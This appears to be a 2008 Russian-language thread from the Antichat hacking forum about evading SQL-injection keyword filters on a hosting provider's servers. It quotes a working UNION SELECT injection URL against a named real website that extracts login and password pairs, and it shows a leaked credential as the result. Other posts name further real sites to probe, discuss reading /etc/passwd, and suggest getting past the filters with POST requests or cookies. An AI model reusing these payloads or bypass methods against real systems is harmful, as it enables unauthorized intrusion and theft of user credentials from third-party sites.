ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.05.2008, 15:38
Аватар для goror
goror
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775

Репутация: 1
По умолчанию

Цитата:
Сообщение от Spyder  
Да йопт, чё пробовать то))) Пост работает, сам проверял
Кстати там ещё фильтруется слово /etc/passwd
Вобщем вот
http://www.internatura.ru/index.php?op=cat&sec=4&gn=-1+union+select+concat_ws(':',login,password)+from+ users/*
viktor:1940
А если параметр в скрипте только через $_GET передается, есть возможность обхода фильтрации?
 
Ответить с цитированием

  #12  
Старый 04.05.2008, 15:46
Аватар для goror
goror
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775

Репутация: 1
По умолчанию

Цитата:
Сообщение от ENFIX  
Довольно интересно...))
Запрос откидывается, если в запросе (масло маслянное) присутствуют Union, Select, From, именно в такой последовательности...
Тут думаю или пост, или пробовать подзапросы
На одном из серверов Sweb-a фильтруется даже select from,
например http://www.74region.ru/?select%20from ,
а на некоторых не фильтруется последовательность
"select, from, union, select".
 
Ответить с цитированием

  #13  
Старый 06.05.2008, 10:03
Аватар для -=megahertz=-
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

выложите плз еще скрипт от маднета
 
Ответить с цитированием

  #14  
Старый 06.05.2008, 10:59
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #15  
Старый 07.05.2008, 10:26
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

кстати /etc/passwd фильтруется и через пост ))
 
Ответить с цитированием

  #16  
Старый 07.05.2008, 12:21
Аватар для goror
goror
Новичок
Регистрация: 19.03.2008
Сообщений: 6
Провел на форуме:
30775

Репутация: 1
По умолчанию

Цитата:
Сообщение от blackybr  
Пора бы уже запомнить что на sweb фильтруется from /etc/ passwd и еще несколько подобных выражений.. обходится все посылкой пост запросов, кукисов ..и тд
На нкоторых серверах sweb не фильтруется "from".

Пример.
http://1-avto.com/car.html?select%20from не фильтруется
а http://1-avto.com/car.html?union%20select%20from
фильтруется.

А по поводу пост запросов и т.д., в некоторых скриптах только гет проходит.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Эффективные Слепые Иньекции Евгений Минаев Авторские статьи 10 31.05.2008 09:43
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18
SQL инъекция в сервере MySQL k00p3r Чужие Статьи 0 12.06.2005 12:41
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ